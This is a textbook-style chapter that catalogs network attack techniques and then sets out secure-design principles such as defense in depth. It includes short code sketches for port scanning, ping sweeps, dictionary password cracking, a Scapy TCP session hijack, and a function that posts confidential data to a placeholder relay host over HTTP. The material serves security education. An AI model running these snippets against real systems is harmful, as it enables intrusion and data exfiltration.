After hackers gain administrative access, they enjoy hacking other systems on the network. As each new system is hacked, the attacker performs the steps that were outlined previously to gather additional system and password information. Hackers try to scan and exploit a single system or a whole set of networks and usually automate the whole process.

In addition, hackers will cover their tracks either by deleting log entries or falsifying them.

Threats Classification

In classifying security threats, it is common to find general categories that resemble the perspective of the attacker and the approaches that are used to exploit software. Attack patterns are a powerful mechanism to capture and communicate the perspective of the attacker. These patterns are descriptions of common methods for exploiting vulnerabilities. The patterns derive from the concept of design patterns that are applied in a destructive rather than constructive context and are generated from in-depth analysis of specific, real-world exploit examples. The following list illustrates examples of threat categories that are based on this criterion. Notice that some threats are not malicious attacks. Examples of nonmalicious threats include forces of nature such as hurricanes and earthquakes.

Later in this chapter, you learn about some of the general categories under which threats can be regrouped, such as:

  • Enumeration and fingerprinting
  • Spoofing and impersonation
  • Man-in-the-middle
  • Overt and covert channels
  • Blended threats and malware
  • Exploitation of privilege and trust
  • Confidentiality
  • Password attacks
  • Availability attacks
    • Denial of service (DoS)
    • Botnet
  • Physical security attacks
  • Forces of nature

To assist in enhancing security throughout the security lifecycle, there are many publicly available classification databases that provide a catalog of attack patterns and classification taxonomies. They are aimed at providing a consistent view and method for identifying, collecting, refining, and sharing attack patterns for specific communities of interest. The following are four of the most prominent databases:

  • Common Attack Pattern Enumeration and Classification (CAPEC): Sponsored by the U.S. Department of Homeland Security as part of the software assurance strategic initiative of the National Cyber Security Division, the objective of this effort is to provide a publicly available catalog of attack patterns along with a comprehensive schema and classification taxonomy. More information can be found at http://capec.mitre.org.
  • Open Web Application Security Project (OWASP) Application Security Verification Standard (ASVS): OWASP is a not-for-profit worldwide charitable organization focused on improving the security of application software. The primary objective of ASVS is to normalize the range in the coverage and level of rigor available in the market when it comes to performing web application security verification using a commercially workable open standard. More information can be found at https://www.owasp.org.
  • Web Application Security Consortium Threat Classification (WASC TC): Sponsored by the WASC, this is a cooperative effort to clarify and organize the threats to the security of a website. The project is aimed at developing and promoting industry-standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors have the ability to access a consistent language and definitions for web security-related issues. More information can be found at http://www.webappsec.org.
  • Malware Attribute Enumeration and Characterization (MAEC): Created by MITRE, this effort is international in scope and free for public use. MAEC is a standardized language for encoding and communicating high-fidelity information about malware based on attributes such as behaviors, artifacts, and attack patterns. More information can be found at http://maec.mitre.org.

Enumeration and Fingerprinting with Ping Sweeps and Port Scans

Enumeration and fingerprinting are types of attacks that use legitimate tools for illegitimate purposes. Some of the tools, such as port-scan and ping-sweep applications, run a series of tests against hosts and devices to identify vulnerable services that need attention. IP addresses and port or banner data from both TCP and UDP ports are examined to gather information.

In an illegitimate situation, a port scan is a series of messages sent by someone attempting to break into a computer to learn which computer network services (each service is associated with a well-known port number) the computer provides. Port scanning can be automated to scan a range of TCP or UDP port numbers on a host to detect listening services. Port scanning, a favorite computer hacker approach, provides information to the hacker about where to probe for weaknesses. Essentially, a port scan consists of sending a message to each port, one at a time. The kind of response received indicates whether the port is being used and needs further probing.
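
The mechanics can be sketched in a few lines of Python as a simple TCP connect scan: attempt a connection to each port and record the ones that accept. The target address (from the reserved TEST-NET range) and the port range are placeholder assumptions, and a scan like this should only ever be run against systems you are authorized to test:

    import socket

    target = "192.0.2.10"  # placeholder address; use a host you are authorized to scan
    open_ports = []

    for port in range(20, 1025):  # well-known port range
        # A completed TCP three-way handshake means a service is listening on the port.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)
            if s.connect_ex((target, port)) == 0:
                open_ports.append(port)

    print("Listening services found on ports:", open_ports)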

A ping sweep, also known as an Internet Control Message Protocol (ICMP) sweep, is a basic network-scanning technique that is used to determine which IP addresses map to live hosts (computers). A ping sweep consists of ICMP echo-requests (pings) sent to multiple hosts, whereas a single ping consists of ICMP echo-requests that are sent to one specific host computer. If a given address is live, that host returns an ICMP echo-reply. The goal of the ping sweep is to find hosts available on the network to probe for vulnerabilities. Ping sweeps are among the oldest and slowest methods that are used to scan a network.
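
A ping sweep can be sketched similarly. Because crafting raw ICMP packets requires administrative privileges, this minimal Python example simply invokes the operating system's ping command (shown with Linux-style options); the subnet is a placeholder from the reserved TEST-NET range, and the same authorization caveat applies:

    import ipaddress
    import subprocess

    network = ipaddress.ip_network("192.0.2.0/28")  # placeholder subnet
    live_hosts = []

    for host in network.hosts():
        # "-c 1" sends a single ICMP echo-request; "-W 1" waits one second for the echo-reply.
        result = subprocess.run(["ping", "-c", "1", "-W", "1", str(host)],
                                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        if result.returncode == 0:
            live_hosts.append(str(host))

    print("Hosts answering ICMP echo-requests:", live_hosts)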

IP Spoofing Attacks

The prime goal of an IP spoofing attack is to establish a connection that allows the attacker to gain root access to the host and to create a backdoor entry path into the target system.

IP spoofing is a technique used to gain unauthorized access to computers whereby the intruder sends messages to a computer with an IP address that indicates the message is coming from a trusted host. The attacker learns the IP address of a trusted host and modifies the packet headers so that it appears that the packets are coming from that trusted host.

At a high level, the concept of IP spoofing is easy to comprehend. Routers determine the best route between distant computers by examining the destination address, and ignore the source address. In a spoofing attack, an attacker outside your network pretends to be a trusted computer by using a trusted internal or external IP address.

If an attacker manages to change the routing tables to divert network packets to the spoofed IP address, the attacker can receive all the network packets addressed to the spoofed address and reply just as any trusted user can.

IP spoofing can also provide access to user accounts and passwords. For example, an attacker can emulate one of your internal users in ways that prove embarrassing for your organization. The attacker could send email messages to business partners that appear to have originated from someone within your organization. Such attacks are easier to perpetrate when an attacker has a user account and password, but they are also possible when attackers combine simple spoofing attacks with their knowledge of messaging protocols.

A rudimentary use of IP spoofing also involves bombarding a site with IP packets or ping requests while spoofing the source address as a third party's registered public address. When the destination host receives the requests, it responds to what appears to be a legitimate request. If multiple hosts are attacked with spoofed requests, their collective replies to the third-party spoofed IP address create an unsupportable flood of packets, thus creating a DoS attack.

Sequence Prediction

The basis of IP spoofing during a TCP communication lies in an inherent security weakness known as sequence prediction. Hackers can guess or predict the TCP sequence numbers that are used to construct a TCP packet without receiving any responses from the server. Their prediction allows them to spoof a trusted host on a local network. To mount an IP spoofing attack, the hacker listens to communications between two systems. The hacker sends packets to the target system with the source IP address of the trusted system, as shown in Figure 1-5.

Figure 1-5. Sequence Number Prediction

If the packets from the hacker have the sequence numbers that the target system is expecting, and if these packets arrive before the packets from the real, trusted system, the hacker becomes the trusted host.

To engage in IP spoofing, hackers must first use a variety of techniques to find an IP address of a trusted host and then modify their packet headers to appear as though packets are coming from that trusted host. Further, the attacker can engage other unsuspecting hosts to generate traffic that appears as though it too is coming from the trusted host, thus flooding the network.

Trust Exploitation

Trust exploitation refers to an individual taking advantage of a trust relationship within a network.

As an example of trust exploitation, consider the network shown in Figure 1-6, where System A is in the demilitarized zone (DMZ) of a firewall. System B, located on the inside of the firewall, trusts System A. When a hacker on the outside network compromises System A in the DMZ, the attacker can leverage the trust relationship that System B has with System A to gain access to System B.

Figure 1-6. Trust Exploitation

A DMZ can be seen as a semi-secure segment of your network. A DMZ is typically used to provide outside users with access to corporate resources, because these users are not allowed to reach inside servers directly. However, a DMZ server might be allowed to reach inside resources directly. In a trust exploitation attack, a hacker could hack a DMZ server and use it as a springboard to reach the inside network.

Several trust models may exist in a network:

  • Windows
    • Domains
    • Active Directory
  • Linux and UNIX
    • Network File System (NFS)
    • Network Information Services Plus (NIS+)

Password Attacks

Password attacks can be implemented using several methods, including brute-force attacks, Trojan horse programs, IP spoofing, keyloggers, packet sniffers, and dictionary attacks. Although packet sniffers and IP spoofing can yield user accounts and passwords, password attacks usually refer to repeated attempts to identify a user account, password, or both. These repeated attempts are called brute-force attacks.

To execute a brute-force attack, an attacker can use a program that runs across the network and attempts to log in to a shared resource, such as a server. When an attacker gains access to a resource, the attacker has the same access rights as the rightful user. If this account has sufficient privileges, the attacker can create a back door for future access that remains usable even if the status or password of the compromised user account later changes.

Just as with packet sniffers and IP spoofing attacks, a brute-force password attack can provide access to accounts that attackers then use to modify critical network files and services. For example, an attacker can compromise your network's integrity by modifying your routing tables so that all network packets are routed to the attacker before being forwarded to their final destination. The attacker can then monitor all network traffic, effectively becoming a man in the middle.

Passwords present a security risk if they are stored as plain text, so they must be protected. On most systems, passwords are run through an algorithm that generates a one-way hash. A one-way hash cannot be reversed to recover the original text. Most systems do not store or decrypt the password itself; they store only the one-way hash. During the login process, you supply an account and password, the system hashes the supplied password, and it compares that hash to the hash stored on the system. If the hashes are the same, the system assumes that the user supplied the proper password.

Remember that passing the password through an algorithm results in a password hash. The hash is not an encrypted password, but rather the output of a one-way function. The strength of the hash is that it can be re-created only from the original user and password information, and that it is computationally infeasible to retrieve the original information from the hash. This strength makes hashes well suited to encoding passwords for storage. When granting access, it is the hashes, rather than the plain-text passwords, that are calculated and compared.
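
The verify-by-rehashing flow can be sketched in a few lines of Python. This is a generic illustration using the standard library's PBKDF2 routine, not the scheme of any particular operating system.

    import hashlib
    import hmac
    import os

    def hash_password(password, salt=None):
        """Derive a one-way hash; the salt and hash, never the password, are stored."""
        salt = salt or os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return salt, digest

    def verify_password(password, salt, stored_digest):
        """Re-hash the supplied password and compare hashes; nothing is ever decrypted."""
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return hmac.compare_digest(candidate, stored_digest)

    salt, stored = hash_password("S3cure-Pa55")
    print(verify_password("S3cure-Pa55", salt, stored))   # True
    print(verify_password("guess", salt, stored))         # False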

Hackers use many tools and techniques to crack passwords:

  • Word lists: These programs use lists of words, phrases, or other combinations of letters, numbers, and symbols that computer users often use as passwords. Hackers enter word after word at high speed (called a dictionary attack) until they find a match; a short sketch of this technique follows the list.
  • Brute force: This approach relies on power and repetition. It compares every possible combination and permutation of characters until it finds a match. Because it must try every conceivable character combination, brute force is an extremely slow process, but given enough time it eventually cracks any password.
  • Hybrid crackers: Some password crackers mix the two techniques. This combines the best of both methods and is highly effective against poorly constructed passwords.
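
As referenced in the first item above, a dictionary attack reduces to hashing each candidate word and comparing it with the captured hash. A minimal sketch, assuming an unsalted SHA-256 hash has been obtained (purely for illustration):

    import hashlib

    def dictionary_attack(target_hash, wordlist):
        """Hash each candidate word and compare it to the captured hash."""
        for word in wordlist:
            if hashlib.sha256(word.encode()).hexdigest() == target_hash:
                return word
        return None

    # A weak password falls to even a tiny word list.
    captured = hashlib.sha256(b"letmein").hexdigest()
    print(dictionary_attack(captured, ["password", "123456", "letmein"]))  # letmein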

Password cracking attacks any application or service that accepts user authentication, including the following:

  • NetBIOS over TCP (TCP 139)
  • Direct host (TCP 445)
  • FTP (TCP 21)
  • Telnet (TCP 23)
  • Simple Network Management Protocol (SNMP) (UDP 161)
  • Point-to-Point Tunneling Protocol (PPTP) (TCP 1723)
  • Terminal services (TCP 3389)

Confidentiality and Integrity Attacks

Confidentiality breaches can occur when an attacker attempts to gain access to and read sensitive data. These attacks can be extremely difficult to detect because the attacker can copy sensitive data without the knowledge of the owner and without leaving a trace.

A confidentiality breach can occur simply because of incorrect file protections. For instance, a sensitive file could mistakenly be given global read access. Unauthorized copying or examination of the file would probably be difficult to track without having some type of audit mechanism running that logs every file operation. If a user had no reason to suspect unwanted access, however, the audit file would probably never be examined.

In Figure 1-7, the attacker is able to compromise an exposed web server. Using this server as a beachhead, the attacker then gains full access to the database server from which customer data is downloaded. The attacker then uses information from the database, such as a username, password, and email address, to intercept and read sensitive email messages destined for a user in the branch office. This attack is difficult to detect because the attacker did not modify or delete any data. The data was only read and downloaded. Without some kind of auditing mechanism on the server, it is unlikely that this attack will be discovered.

Figure 1-7. Breach of Confidentiality

Attackers can use many methods to compromise confidentiality, the most common of which are as follows:

  • Ping sweeps and port scanning: Sweeping a range of addresses to find live hosts and probing each host for open ports (a minimal connect-scan sketch follows this list).
  • Packet sniffing: Intercepting and logging traffic that passes over a digital network or part of a network.
  • Emanations capturing: Capturing electrical transmissions from the equipment of an organization to deduce information regarding the organization.
  • Overt channels: Listening on obvious and visible communications. Overt channels can be used for covert communication.
  • Covert channels: Hiding information within a transmission channel that is based on encoding data using another set of events.
  • Wiretapping: Monitoring the telephone or Internet conversations of a third party, often covertly.
  • Social engineering: Using social skills or relationships to manipulate people inside the network to provide the information needed to access the network.
  • Dumpster diving: Searching through company dumpsters or trash cans looking for information, such as phone books, organization charts, manuals, memos, charts, and other documentation that can provide a valuable source of information for hackers.
  • Phishing: Attempting to criminally acquire sensitive information, such as usernames and passwords, by masquerading as trustworthy entities.
  • Pharming: Redirecting the traffic of a website to another, rogue website.
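
As referenced in the first item above, a basic port scan is little more than a series of connection attempts. The sketch below uses a plain TCP connect() scan against a hypothetical lab address; real tools such as Nmap use faster and stealthier techniques.

    import socket

    def scan_ports(host, ports, timeout=0.5):
        """Attempt a full TCP connect() to each port; success means the port is open."""
        open_ports = []
        for port in ports:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                if s.connect_ex((host, port)) == 0:
                    open_ports.append(port)
        return open_ports

    # Probe a lab host for a few of the services listed earlier in the chapter.
    print(scan_ports("192.0.2.10", [21, 23, 139, 445, 3389]))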

Many of these methods are used to compromise more than confidentiality. They are often elements of attacks on integrity and availability.

Man-in-the-Middle Attacks

A more complex form of IP spoofing is the man-in-the-middle attack, in which the hacker monitors the traffic that crosses the network and inserts himself as a stealthy intermediary between the sender and the receiver, as shown in Figure 1-8.

Figure 1-8. IP Source Routing Attack

Hackers use man-in-the-middle attacks to perform many security violations:

  • Theft of information
  • Hijacking of an ongoing session to gain access to your internal network resources
  • Analysis of traffic to derive information about your network and its users
  • DoS
  • Corruption of transmitted data
  • Introduction of new information into network sessions

These attacks are either blind or nonblind. In a blind attack, the attacker operates from outside the path of the connection, where the sequence and acknowledgment numbers cannot be observed. In a nonblind attack, the connection crosses a network segment that the hacker can sniff, so those values are visible. A good example of a blind attack can be found at http://wiki.cas.mcmaster.ca/index.php/The_Mitnick_attack.

TCP session hijacking is a common variant of the man-in-the-middle attack. The attacker sniffs to identify the client and server IP addresses and relative port numbers. The attacker modifies his or her packet headers to spoof TCP/IP packets from the client, and then waits to receive an ACK packet from the client communicating with the server. The ACK packet contains the sequence number of the next packet that the client is expecting. The attacker replies to the client using a modified packet with the source address of the server and the destination address of the client. This packet results in a reset that disconnects the legitimate client. The attacker takes over communications with the server by spoofing the expected sequence number from the ACK that was previously sent from the legitimate client to the server. (This could also be an attack against confidentiality.)
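
Once the client's last sequence and acknowledgment numbers are known, continuing the session is just a matter of crafting a segment the server expects. The following Scapy sketch is a rough illustration with purely hypothetical addresses, ports, sequence values, and payload.

    from scapy.all import IP, TCP, send  # assumes Scapy in a controlled lab

    client, server = "10.1.1.5", "10.1.1.10"      # values learned by sniffing the session
    client_port, server_port = 49152, 23
    next_seq, next_ack = 1_000_501, 2_240_377     # taken from the client's last ACK

    # Continue the hijacked session toward the server while posing as the client.
    hijack = IP(src=client, dst=server) / TCP(
        sport=client_port, dport=server_port, flags="PA",
        seq=next_seq, ack=next_ack) / b"show running-config\r\n"
    send(hijack, verbose=False)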

Another clever man-in-the-middle attack is for the hacker to pose as the DHCP server on the network, handing out his own IP address as the default gateway during the DHCP offer.

Overt and Covert Channels

Overt and covert channels refer to the capability to hide information within or using other information:

  • Overt channel: A transmission channel that is based on tunneling one protocol inside of another. It could be a clear-text transmission inserted inside another clear-text protocol header.
  • Covert channel: A transmission channel that is based on encoding data using another set of events. The data is concealed.

There are numerous ways that Internet protocols and the data that is transferred over them can provide overt and covert channels. The bad news is that firewalls generally cannot detect these channels; therefore, attackers can use them to receive confidential information in an unauthorized manner.

With an overt channel, one protocol is tunneled within another to bypass the security policy; for example, Telnet over FTP, instant messaging over HTTP, and IP over Post Office Protocol version 3 (POP3). Another example of an overt channel is using watermarks in JPEG images to leak confidential information.

One common use of an overt channel is instant messaging (IM). Most organizations' firewalls allow outbound HTTP but block IM, so a user on the inside of the network can leak confidential information by carrying IM traffic over an HTTP session.
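
Because the firewall sees only an ordinary HTTP POST, this kind of tunneling blends in with permitted web traffic. A minimal sketch using only the Python standard library; the relay URL and message are hypothetical.

    import json
    import urllib.request

    def send_im_over_http(message, url="http://relay.example.com/chat"):
        """Wrap an IM-style message in an ordinary HTTP POST so it looks like normal web traffic."""
        body = json.dumps({"msg": message}).encode()
        request = urllib.request.Request(
            url, data=body, headers={"Content-Type": "application/json"})
        urllib.request.urlopen(request, timeout=5)

    send_im_over_http("confidential quarterly figures to follow")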

In Figure 1-9, the firewall allows outbound HTTP while a user on the inside of the network is leaking confidential information using instant messaging over HTTP.

Figure 1-9. Overt Channel

Steganography is another example of an overt channel. The term comes from the Greek word steganos, meaning “covered” or “secret,” and literally means covered or secret writing. The combination of CPU power and interest in privacy has led to the development of techniques for hiding messages in digital pictures and digitized audio.

For example, certain bits of a digital graphic can be used to hide messages. The key to knowing which bits are special is shared between the two parties that want to communicate privately. The private message typically has so few bits relative to the total number of bits in the image that changing them is not visually noticeable. Without a direct comparison of the original and the processed image, it is practically impossible to tell that anything has been changed. Still, statistical analysis can sometimes reveal the hidden data by detecting non-randomness in the file, which indicates that information is being carried inside it.
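
The classic least-significant-bit (LSB) approach can be shown in a few lines of Python operating on a raw byte buffer that stands in for pixel data. This is a toy illustration, not a robust steganography tool.

    def embed(pixels, secret):
        """Hide each bit of the secret in the least significant bit of successive pixel bytes."""
        out = bytearray(pixels)
        bits = [(byte >> i) & 1 for byte in secret for i in range(7, -1, -1)]
        for index, bit in enumerate(bits):
            out[index] = (out[index] & 0xFE) | bit
        return out

    def extract(pixels, length):
        """Reassemble the hidden bytes from the least significant bits."""
        bits = [pixels[i] & 1 for i in range(length * 8)]
        return bytes(
            sum(bit << (7 - j) for j, bit in enumerate(bits[k * 8:(k + 1) * 8]))
            for k in range(length))

    cover = bytearray(range(256)) * 4        # stand-in for raw image pixel data
    stego = embed(cover, b"secret")
    print(extract(stego, 6))                 # b'secret'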

With a covert channel, information is encoded as another set of events. For example, an attacker could install a Trojan horse on a target host. The Trojan horse could be written to send binary information back to the server of the attacker. The client, infected with the Trojan horse, could return to the hacker’s server a ping status report in a binary format, where a 0 would represent a successful ping over a one-minute period, and a 1 would represent two successful pings over a one-minute period. The hacker could keep connectivity statistics for all the compromised clients he has around the world.

If ICMP is not permitted through a firewall, another tactic is to have the client visit the web page of the attacker. The Trojan horse software, now installed on the client, has a “call home” feature that automatically opens a connection to TCP port 80 at a specific IP address, the address of the hacker’s web server. All of this work is done so that the hacker can keep precise statistics of how many compromised workstations he possesses around the world. One visit per day would be represented by a 1, and no visits would be represented by a 0. As you might imagine, this technique is usually quite limited in bandwidth.

Phishing, Pharming, and Identity Theft

Identity theft continues to be a problem. In computing, phishing is an attempt to criminally acquire sensitive information, such as usernames, passwords, and credit card details, by masquerading as a trustworthy entity. Phishing is typically carried out by email or instant message (IM), although sometimes phone contact is attempted; the phisher often directs users to enter details at a website, as shown on the left in Figure 1-10. Phishing is an example of social engineering.

Figure 1-10. Phishing and Pharming Attacks

Pharming, also illustrated in Figure 1-10, is an attack aimed at redirecting the traffic of a website to another website. Pharming is conducted either by changing the hosts file on a victim computer or by exploiting a vulnerable Domain Name System (DNS) server. Pharming has become a major concern to businesses hosting e-commerce and online banking websites.

To protect against pharming, organizations implement “personalization” technologies, such as user-chosen images on the login page. Consider also supporting identified email initiatives such as DomainKeys Identified Mail (DKIM); these initiatives are beyond the scope of this book.

Availability Attacks

DoS attacks attempt to compromise the availability of a network, host, or application. They are considered a major risk because they can easily interrupt a business process and cause significant loss. These attacks are relatively simple to conduct, even by an unskilled attacker.

DoS attacks are usually the consequence of one of the following:

  • The failure of a host or application to handle an unexpected condition, such as maliciously formatted input data or an unexpected interaction of system components.
  • The inability of a network, host, or application to handle an enormous quantity of data, which crashes the system or brings it to a halt. Even if the firewall protects the corporate web server in the DMZ from receiving a large amount of data, and thus from crashing, the link connecting the corporation to its service provider can still be completely clogged, and this bandwidth starvation is itself a DoS.

Hackers can use many types of attacks to compromise availability:

  • Botnets
  • DoS
  • DDoS
  • SYN floods
  • ICMP floods
  • Electrical power
  • Computer environment

Botnets

Botnet is a term for a collection of software robots, or bots, that run autonomously and automatically. They run on groups of “zombie” computers controlled by crackers.

Although the term botnet can be used to refer to any group of bots, it is generally used to refer to a collection of compromised systems running worms, Trojan horses, or back doors, under a common command and control infrastructure. The originator of a botnet controls the group of computers remotely, usually through a means such as Internet Relay Chat (IRC).

Often, the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden. Generally, the attacker has compromised a large number of systems using various methods, such as exploits, buffer overflows, and so on. Newer bots automatically scan their environment and propagate using detected vulnerabilities and weak passwords. Sometimes a controller will hide an IRC server installation on an educational or corporate site, where high-speed connections can support a large number of other bots.

Several botnets have been found and removed from the Internet. The Dutch police found a 1.5-million node botnet (http://www.wisegeek.com/what-is-a-botnet.htm), and the Norwegian ISP Telenor disbanded a 10,000-node botnet. Large, coordinated international efforts to shut down botnets have also been initiated. Some estimates indicate that up to 25 percent of all personal computers are part of a botnet (http://everything.explained.at/Botnet/).

DoS and DDoS Attacks

DoS attacks are the most publicized form of attack. They are also among the most difficult to eliminate. A DoS attack on a server sends an extremely large volume of requests over a network or the Internet. These large volumes of requests cause the attacked server to slow down dramatically. Consequently, the attacked server becomes unavailable for legitimate access and use.

DoS attacks differ from most other attacks because DoS attacks do not try to gain access to your network or the information on your network. These attacks focus on making a service unavailable for normal use. Attackers typically accomplish this by exhausting some resource limitation on the network or within an operating system or application. These attacks typically require little effort to execute because they either take advantage of protocol weaknesses or use traffic normally allowed into a network. DoS attacks are among the most difficult to completely eliminate because of the way they use protocol weaknesses and accepted traffic to attack a network. Some hackers regard DoS attacks as trivial and in bad form because they require so little effort to execute. Still, because of their ease of implementation and potentially significant damage, DoS attacks deserve special attention from security administrators.

System administrators can install software fixes to limit the damage caused by all known DoS attacks. However, as with viruses, hackers constantly develop new DoS attacks.

A DDoS attack generates much higher levels of flooding traffic by using the combined bandwidth of multiple machines to target a single machine or network. The DDoS attack enlists a network of compromised machines that contain a remotely controlled agent, or zombie, attack program. A master control mechanism provides direction and control. When the zombies receive instructions from the master agent, they each begin generating malicious traffic aimed at the victim.

DDoS attacks are the “next generation” of DoS attacks on the Internet. This type of attack is not new. UDP and TCP SYN flooding, ICMP echo-request floods, and ICMP directed broadcasts (also known as Smurf attacks) are similar to DDoS attacks; however, the scope of the attack is new. Victims of DDoS attacks experience packet flooding from many different sources, possibly spoofed IP source addresses, which brings their network connectivity to a grinding halt. In the past, the typical DoS attack involved a single attempt to flood a target host with packets. With DDoS tools, an attacker can conduct the same attack using thousands of systems.

Figure 1-11 shows the process of a DDoS attack:

  1. The hacker uses a host to scan for systems to hack.
  2. After the hacker accesses handler systems, the hacker installs zombie software on them to scan, compromise, and infect agent systems.
  3. Remote control attack software is loaded on agent systems.
  4. The hacker issues instructions to the handlers, which in turn direct their agents to launch the DDoS attack against the victim.

Figure 1-11. DDoS Attack

Blended Threats

The actual breach and vulnerability exploit is often accomplished using malware that infects, propagates, and delivers its payload by combining techniques associated with traditional malware. Known as blended threats, these attack mechanisms combine the characteristics of viruses, worms, Trojan horses, spyware, and other malware.

A blended threat will exploit a vulnerability such as a buffer overflow or lack of HTTP input validation. Such attacks can spread without human intervention by scanning for other hosts to infect, embedding code in HTML, or by spamming, to name a few methods.

Blended threats plant Trojans and back doors. They are often part of botnet attacks, which try to raise privilege levels, create network shares, and steal data.

Most blended attacks are considered “zero day,” meaning that they have not been previously identified. Blended attacks are ever-evolving and pretested by cybercriminals on common antivirus products before they are released. These threats easily breach firewalls and open channels, and they represent a challenge to detect and mitigate.

Principles of Secure Network Design

In planning an overall strategy for security architecture design, sound principles are needed to accomplish an effective security posture. The selective combination of these principles provides the fundamentals for threat mitigation within the context of a security policy and risk management.

  • Defense in depth: This is an umbrella term that encompasses many of the other guidelines in this list. It is defined by architectures based on end-to-end security, using a layered approach. The objective is to create security domains and separate them by different types of security controls. The concept also defines redundancy of controls, where the failure of one layer is mitigated by the existence of other layers of controls.
  • Compartmentalization: Creating security domains is crucial. Different assets with different values should reside in different security domains, be it physically or logically. Granular trust relationships between compartments would mitigate attacks that try to gain a foothold in lower-security domains to exploit high-value assets in higher-security domains.
  • Least privilege: This principle applies a need-to-know approach to trust relationships between security domains. The idea, which originated in military and intelligence operations, is that if fewer people know about certain information, the risk of unauthorized access is diminished. In network security, this results in restrictive policies, where access to and from a security domain is allowed only for the required users, applications, or network traffic. Everything else is denied by default.
  • Weakest link: This is a fundamental concept—a security system is as effective as its weakest link. A layered approach to security, with weaker or less protected assets residing in separated security domains, mitigates the necessary existence of these weakest links. Humans are often considered to be the weakest link in information security architectures.
  • Separation and rotation of duties: This is the concept of developing systems where more than one individual is required to complete a certain task. The principle is that this requirement can mitigate fraud and error. This applies to information security controls, and it applies to both technical controls and human procedures to manage those controls.
  • Hierarchically trusted components and protection: This principle applies a hierarchical approach to the compartmentalization and least privilege ideas, aiming at providing a more structured approach to data classification and security controls. The concept assumes that the hierarchy will be easier to implement and manage, resulting in similarly manageable and compartmentalized security controls.
  • Mediated access: This principle is based on centralizing security controls to protect groups of assets or security domains. In that sense, firewalls, proxies, and other security controls act on behalf of the assets they are designed to protect, and mediate the trust relationships between security domains. Special considerations should be in place to prevent the mediation component from becoming a single point of failure.
  • Accountability and traceability: This concept implies the existence of risk and the ability to manage and mitigate it, and not necessarily avoid or remove it. Information security architectures should provide mechanisms to track activity of users, attackers, and even security administrators. They should include provisions for accountability and nonrepudiation. This principle translates into specific functions, such as security audits, event management and monitoring, forensics, and others.

Cisco has always been a proponent of defense in depth. This was made clear in 2000 when it released its Cisco SAFE Blueprint for enterprise (SAFE is not an acronym), where it laid out its vision for defense in depth.

Defense in Depth

Addressing the fact that a security system is only as strong as its weakest link is often difficult when designing a system’s security. The complexity of modern systems makes it hard to identify each individual weak link, let alone the weakest one. Thus, it is often most desirable to eliminate possible weaknesses by instituting several concurrent security methods.

Securing information and systems against all threats requires multiple, overlapping protection approaches that address the human, technological, and operational aspects of information technology. Using multiple, overlapping protection approaches ensures that the failure or circumvention of any individual protection approach never leaves the system unprotected.

When a system is designed and implemented, its quality should always be questioned through design reviews and testing. Identification of various failure modes might help a designer evaluate the probability of element failure, and identify the links that are the most critical for the security of the whole system. Many systems have a security-based single point of failure, an element of functionality or protection that, if compromised, would cause the compromise of the whole system. It is desirable to eliminate or at least harden such single points of failure in a high-assurance system.

Defense in depth is a philosophy that provides layered security to a system by using multiple security mechanisms:

  • Security mechanisms should back each other up and provide diversity and redundancy of protection.
  • Security mechanisms should not depend on each other, so that the security of one mechanism does not rest on factors outside its control.
  • Using defense in depth, you can eliminate single points of failure and augment weak links in the system to provide stronger protection with multiple layers.

The defense-in-depth strategy recommends several principles:

  • Defend in multiple places: Given that insiders or outsiders can attack a target from multiple points, an organization must deploy protection mechanisms at multiple locations to resist all classes of attacks. At a minimum, you should include three defensive focus areas:
    • Defend the networks and infrastructure: Protect the local- and wide-area communications networks from attacks, such as DoS attacks. Provide confidentiality and integrity protection for data that is transmitted over the networks; for example, use encryption and traffic flow security measures to resist passive monitoring.
    • Defend the enclave boundaries: Deploy firewalls and intrusion detection systems (IDS) or intrusion prevention systems (IPS) or both to resist active network attacks.
    • Defend the computing environment: Provide access controls and host intrusion prevention systems (HIPS) on hosts and servers to resist insider, close-in, and distribution attacks.
  • Build layered defenses: Even the best available information assurance products have inherent weaknesses. Therefore, it is only a matter of time before an adversary finds an exploitable vulnerability. An effective countermeasure is to deploy multiple defense mechanisms between the adversary and the target. Each of these mechanisms must present unique obstacles to the adversary. Further, each mechanism should include both protection and detection measures. These measures increase the risk of detection for adversaries while reducing their chances of success, or make successful penetrations unaffordable. One example of a layered defense is to have nested firewalls (each coupled with IDS or IPS) that are deployed at outer and inner network boundaries. The inner firewalls may support more granular access control and data filtering.
  • Use robust components: Specify the security robustness (that is, strength and assurance) of each information assurance component as a function of the value of what it is protecting and the threat at the point of application. For example, it is often more effective and operationally suitable to deploy stronger mechanisms at the network boundaries than at the user desktop.
  • Employ robust key management: Deploy robust encryption key management and public key infrastructures that support all the incorporated information assurance technologies and that are highly resistant to attack.
  • Deploy an IDS or IPS: Deploy infrastructures to detect and prevent intrusions and to analyze and correlate the results and react accordingly. These infrastructures should help the operations staff answer the following questions:
    • Am I under attack?
    • Who is the source?
    • What is the target?
    • Who else is under attack?
    • What are my options?